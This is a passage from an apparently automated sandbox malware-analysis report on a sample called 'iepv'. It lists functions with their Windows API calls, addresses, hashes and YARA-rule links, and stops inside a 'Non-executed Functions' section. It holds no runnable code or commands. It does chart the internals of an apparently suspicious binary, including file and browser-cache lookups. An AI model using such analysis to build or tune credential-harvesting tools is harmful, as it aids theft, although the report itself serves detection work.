                                          • Part of subcall function 00405D12: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00405D5D
                                        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040CBDE
                                        • memset.MSVCRT ref: 0040CBF6
                                        • GetPrivateProfileStringA.KERNEL32(?,?,0040E470,?,00002000,?), ref: 0040CC14
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                        • String ID:
                                        • API String ID: 3143880245-0
                                        • Opcode ID: 811eac5832e1390f9312074c2025befa3d07c45165691015435f79f1b47e9c0c
                                        • Instruction ID: 61a01d79d0c38afbf18374fb8b23c117523dbbac9e0e7ac8a13b7f9b4d6ad9ad
                                        • Opcode Fuzzy Hash: 811eac5832e1390f9312074c2025befa3d07c45165691015435f79f1b47e9c0c
                                        • Instruction Fuzzy Hash: 4E11E372900228AFEF155F64DC89E9B3B69EF04344F100076FA09B2092D6359964CBA8
                                        Function 0040CE24 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindResourceA.KERNEL32(?,?,?), ref: 0040CE31
                                        • SizeofResource.KERNEL32(?,00000000), ref: 0040CE42
                                        • LoadResource.KERNEL32(?,00000000), ref: 0040CE52
                                        • LockResource.KERNEL32(00000000), ref: 0040CE5D
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Resource$FindLoadLockSizeof
                                        • String ID:
                                        • API String ID: 3473537107-0
                                        • Opcode ID: 75b82ee2afe7d3503b758f8299bc546419afb6964919b7572ede41b5c4e7535f
                                        • Instruction ID: 9d247ce79723760bef1392c1a966872d04c3c50bb978bd77b7b350caf2936939
                                        • Opcode Fuzzy Hash: 75b82ee2afe7d3503b758f8299bc546419afb6964919b7572ede41b5c4e7535f
                                        • Instruction Fuzzy Hash: EA01C432600215EFCB194F56DD8995F7F9EEB85390704C136E809EA271D774C810CAD8
                                        Function 00409732 Relevance: 4.6, APIs: 3, Instructions: 124COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004085DD: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004085FF
                                          • Part of subcall function 004085DD: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00408694
                                        • GetStdHandle.KERNEL32(000000F5), ref: 00409757
                                        • CloseHandle.KERNELBASE(?), ref: 0040984A
                                        • SetCursor.USER32 ref: 00409856
                                          • Part of subcall function 0040548F: CreateFileA.KERNELBASE(00000002,40000000,00000001,00000000,00000002,00000000,00000000,004095DB,00000000), ref: 004054A1
                                          • Part of subcall function 004054EC: GetLastError.KERNEL32 ref: 004054FC
                                          • Part of subcall function 004054EC: sprintf.MSVCRT ref: 00405524
                                          • Part of subcall function 004054EC: MessageBoxA.USER32(?,?,Error,00000030), ref: 0040553D
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Handle$??2@??3@CloseCreateCursorErrorFileLastMessagesprintf
                                        • String ID:
                                        • API String ID: 3976026410-0
                                        • Opcode ID: 3ec1295a7d23fb20ca59bfd635dcb7240a0cc71ea91f5bed571e3bf4b17c1ade
                                        • Instruction ID: 1fd2cf4f868221cd8e5376e14e07cf60bda6352084dba89875c8c524ee2be8da
                                        • Opcode Fuzzy Hash: 3ec1295a7d23fb20ca59bfd635dcb7240a0cc71ea91f5bed571e3bf4b17c1ade
                                        • Instruction Fuzzy Hash: A5416232610100EBDB256F69C988B9F77B5AF45321F21446AF446B73E2CB789D80CB18
                                        Function 00406A29 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 44COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: strlen$FileFindFirst
                                        • String ID: ;k@$index.dat
                                        • API String ID: 2516927864-3649366552
                                        • Opcode ID: 358f8c5c7c82daf82593cc25d8059e0e4fd8a016a767248c66992a1bf2dde3ef
                                        • Instruction ID: e53b20a2827c34f246cd8cb1df9afdee6a57a968a8ea5e85fd39d2dfd86dbec5
                                        • Opcode Fuzzy Hash: 358f8c5c7c82daf82593cc25d8059e0e4fd8a016a767248c66992a1bf2dde3ef
                                        • Instruction Fuzzy Hash: 9601963190162C5DCF20E7658C017DA77B89B15305F1181FBB806B21C1DB389B558FAA
                                        Function 00406AC2 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 35COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00406AE2
                                          • Part of subcall function 0040CCAF: RegCloseKey.ADVAPI32(?,?,?,00406B01,?,?,00000104,?), ref: 0040CCEF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Closememset
                                        • String ID: :$:
                                        • API String ID: 2732369425-3780739392
                                        • Opcode ID: 8c3508ec9aea650201ac757f06dab352662364cf1105d935cd1811f48ca154aa
                                        • Instruction ID: d5b43d1bdddb0f3543c83bf4e5e7cd6aa53e09a9d76f36242e1da3e87a1288bc
                                        • Opcode Fuzzy Hash: 8c3508ec9aea650201ac757f06dab352662364cf1105d935cd1811f48ca154aa
                                        • Instruction Fuzzy Hash: 46F0A9B19082A899DF619A15CC417C67FB85F51308F0440FAD9CDB91C6C6B86AC9CB65
                                        Function 00405708 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                        Download Yara Rule
                                        APIs
                                        • malloc.MSVCRT ref: 00405724
                                        • memcpy.MSVCRT(00000000,00000000,?,00000000,?,0040295B,00000001,?,?,00000000,00401BF3,?), ref: 0040573C
                                        • free.MSVCRT ref: 00405745
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: freemallocmemcpy
                                        • String ID:
                                        • API String ID: 3056473165-0
                                        • Opcode ID: 62c4af55305529f409e0bea1128188acda5818f3ef7132d5372e6b59438fdacf
                                        • Instruction ID: 4204a681243c151887bf5a025ea2ecca069ec2e95ee5ad48d59c4fbeff38a6aa
                                        • Opcode Fuzzy Hash: 62c4af55305529f409e0bea1128188acda5818f3ef7132d5372e6b59438fdacf
                                        • Instruction Fuzzy Hash: AAF08972A056119FCB08AA79A98585B739DEF44324B11483FF514E72C2D738AC44DF68
                                        Function 004058BD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040579F: memset.MSVCRT ref: 004057A9
                                          • Part of subcall function 0040579F: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,0040109D,MS Sans Serif,0000000A,00000001), ref: 004057E9
                                        • CreateFontIndirectA.GDI32(?), ref: 004058DB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: CreateFontIndirect_mbscpymemset
                                        • String ID: Arial
                                        • API String ID: 3853255127-493054409
                                        • Opcode ID: 1475a2599611ba5e21b7c36d255b81c75028fc7fc182827917e312dffb651d24
                                        • Instruction ID: d0421fbc028c2d2d7161884e1009b6c32f17e61fe4a3a6cab89604017957388c
                                        • Opcode Fuzzy Hash: 1475a2599611ba5e21b7c36d255b81c75028fc7fc182827917e312dffb651d24
                                        • Instruction Fuzzy Hash: 81D0C960D4020DB6E604B6A1FD4BF49B76C5B00704F504831B941F61E1AAF4A1158699
                                        Function 0040CC39 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 0040CC60
                                          • Part of subcall function 0040CB45: memset.MSVCRT ref: 0040CB63
                                          • Part of subcall function 0040CB45: _itoa.MSVCRT ref: 0040CB7A
                                          • Part of subcall function 0040CB45: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0040CB89
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: PrivateProfile$StringWrite_itoamemset
                                        • String ID:
                                        • API String ID: 4165544737-0
                                        • Opcode ID: b9946992e16449c93204427860f5bd2c5f6b941805b55aa7f7a6f4de4f9adaeb
                                        • Instruction ID: 525d1b5333d9bc9d1c2bfd393fbb628b7be0876f54a79b076e459529c23fafa1
                                        • Opcode Fuzzy Hash: b9946992e16449c93204427860f5bd2c5f6b941805b55aa7f7a6f4de4f9adaeb
                                        • Instruction Fuzzy Hash: 88E0B632004209EBDF125F85ED01AA97B76FF04315F148969FA5C15160D33295B0EB84
                                        Function 00405476 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNELBASE(00000003,80000000,00000001,00000000,00000003,00000000,00000000,00402A1C,9+@,00000001,00000000,?,00402B39), ref: 00405488
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 76eb41ef98c2c5641d3abcf42bcff8ef1eb90f0748ddb7ccec5cb06513cf706a
                                        • Instruction ID: 6cc17ecc0e63add31f30c7be5c96cb6e6d50dce7e189e56331532518d042fa2d
                                        • Opcode Fuzzy Hash: 76eb41ef98c2c5641d3abcf42bcff8ef1eb90f0748ddb7ccec5cb06513cf706a
                                        • Instruction Fuzzy Hash: D5C092B0260200BEFE214B12AE15F36255DE740700F2008647E10F40E0C1A14D208525
                                        Function 0040548F Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNELBASE(00000002,40000000,00000001,00000000,00000002,00000000,00000000,004095DB,00000000), ref: 004054A1
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: fbde9cd00fe5eff3766847e957dcecaf9640c7a61364f5c27615867091559b50
                                        • Instruction ID: 69dfb5ecf65624069a56b7d842b5eb645239c70c77c1b81269cf5ee0886f4079
                                        • Opcode Fuzzy Hash: fbde9cd00fe5eff3766847e957dcecaf9640c7a61364f5c27615867091559b50
                                        • Instruction Fuzzy Hash: 48C092F0260200BEFE204B12AE0AF37255DE780700F1048607A10E40E0C2A14C108525
                                        Function 00406491 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindClose.KERNELBASE(?,004063A7,?,?,?,00000000,00402B0C,?,?,?,?), ref: 0040649B
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: CloseFind
                                        • String ID:
                                        • API String ID: 1863332320-0
                                        • Opcode ID: 571febb4c9117fa6e2e56abce36b66c01aacd5c5f760bc13c6d008cbdab551c8
                                        • Instruction ID: 787eb9efbf0ebf0b4d30fb47fd0eb3d90729e22c384964ea5156421acb3fcbf6
                                        • Opcode Fuzzy Hash: 571febb4c9117fa6e2e56abce36b66c01aacd5c5f760bc13c6d008cbdab551c8
                                        • Instruction Fuzzy Hash: 19C048301105019AE62C5B389C5942A76A0AE493343A50F6CA0F3A20E1E77894A28A08
                                        Function 0040C8A3 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                        Download Yara Rule
                                        APIs
                                        • FreeLibrary.KERNELBASE(?,0040C8C6), ref: 0040C8AF
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        • Opcode ID: 738ff6e65df157840b9e3526bb30d1cb88ea11130717a0abe25991770deb834c
                                        • Instruction ID: 5a87ee5de1accfd3d1346c83d84d08fc20fb9a256ad619443e5e62a78e09debb
                                        • Opcode Fuzzy Hash: 738ff6e65df157840b9e3526bb30d1cb88ea11130717a0abe25991770deb834c
                                        • Instruction Fuzzy Hash: 89C04C351107018BF7219B12C949753B3E4AB00317F40C869955A95494D77CE454CF18
                                        Function 0040CEAA Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                        Download Yara Rule
                                        APIs
                                        • EnumResourceNamesA.KERNEL32(?,?,Function_0000CE24,00000000), ref: 0040CEB9
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: EnumNamesResource
                                        • String ID:
                                        • API String ID: 3334572018-0
                                        • Opcode ID: 9b69f4405ee7bceacd210861de9929361b8f47e7f5b745cdf287a2ae3b80fe65
                                        • Instruction ID: a509d141f3c30914f5d5577e3380947a12cb56614181ed463bd12314e25f5cfc
                                        • Opcode Fuzzy Hash: 9b69f4405ee7bceacd210861de9929361b8f47e7f5b745cdf287a2ae3b80fe65
                                        • Instruction Fuzzy Hash: F5C09B31154341D7C7019F10CD05F1B76D5FB58705F104C397161A40E0D7B144249606
                                        Function 00405759 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesA.KERNELBASE(?,00403409,?,?,?,?,00000000,00402C40,?), ref: 0040575D
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 423b3543d23d905c1eb81c7593e2c8edc8dbd98a56069c9372583ff1f61cd85b
                                        • Instruction ID: dcdad8297477f55eff4f6dd966050ac13875044b2d9d182873d2844fa248ead6
                                        • Opcode Fuzzy Hash: 423b3543d23d905c1eb81c7593e2c8edc8dbd98a56069c9372583ff1f61cd85b
                                        • Instruction Fuzzy Hash: 5CB092752200004BCA0807349D8904D35906B48721B200B28B063D40E0D7308860AA00
                                        Function 004061BD Relevance: 1.4, APIs: 1, Instructions: 125COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00405F72: free.MSVCRT ref: 00405F75
                                          • Part of subcall function 00405F72: free.MSVCRT ref: 00405F7D
                                        • free.MSVCRT ref: 0040627E
                                          • Part of subcall function 0040609F: free.MSVCRT ref: 004060AE
                                          • Part of subcall function 00405708: malloc.MSVCRT ref: 00405724
                                          • Part of subcall function 00405708: memcpy.MSVCRT(00000000,00000000,?,00000000,?,0040295B,00000001,?,?,00000000,00401BF3,?), ref: 0040573C
                                          • Part of subcall function 00405708: free.MSVCRT ref: 00405745
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: free$mallocmemcpy
                                        • String ID:
                                        • API String ID: 3401966785-0
                                        • Opcode ID: 8b5e8f0689b70730765747be11f963899eb1e8a025482a5f5190dc96ffae25fd
                                        • Instruction ID: e5a7c9e5946f31c6abdfc8041d783d09298c05f7c1d7196976ea6ac68c26f342
                                        • Opcode Fuzzy Hash: 8b5e8f0689b70730765747be11f963899eb1e8a025482a5f5190dc96ffae25fd
                                        • Instruction Fuzzy Hash: AE414975D002099FCB20EF99C48059EBBB2BB49324F2541BFD856B7381C738AE96CB55

                                        Non-executed Functions

                                        Function 00403C66 Relevance: 19.7, APIs: 13, Instructions: 228memoryencryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memcmp.MSVCRT(?,0000000C,00000005,-000000F4,?,00000000), ref: 00403CA0
                                        • memset.MSVCRT ref: 00403CC0
                                        • memset.MSVCRT ref: 00403CDB
                                          • Part of subcall function 00403923: memset.MSVCRT ref: 0040393E
                                          • Part of subcall function 00403923: _snprintf.MSVCRT ref: 004039A5
                                        • memset.MSVCRT ref: 00403D14
                                        • memset.MSVCRT ref: 00403D30
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,0000003F,?,?,?,?,?,?), ref: 00403D4C
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,?,?,?,?,?,?), ref: 00403D66
                                          • Part of subcall function 0040381F: wcslen.MSVCRT ref: 00403845
                                          • Part of subcall function 0040381F: wcslen.MSVCRT ref: 0040385C
                                          • Part of subcall function 00403A7B: GetFileSize.KERNEL32(00000000,00000000,000000D0,?,00000000), ref: 00403AA2
                                          • Part of subcall function 00403A7B: memset.MSVCRT ref: 00403ACA
                                          • Part of subcall function 00403A7B: CloseHandle.KERNEL32(00000000), ref: 00403AE3
                                          • Part of subcall function 00403A7B: memset.MSVCRT ref: 00403B02
                                          • Part of subcall function 00403A7B: memcpy.MSVCRT(?,?,00000010,?,00000000,00000027), ref: 00403B14
                                          • Part of subcall function 00403A7B: memset.MSVCRT ref: 00403B64
                                          • Part of subcall function 00403A7B: memset.MSVCRT ref: 00403B78
                                          • Part of subcall function 00403A7B: memcpy.MSVCRT(?,?,00000300,?,?,?,?,?,?), ref: 00403BA4
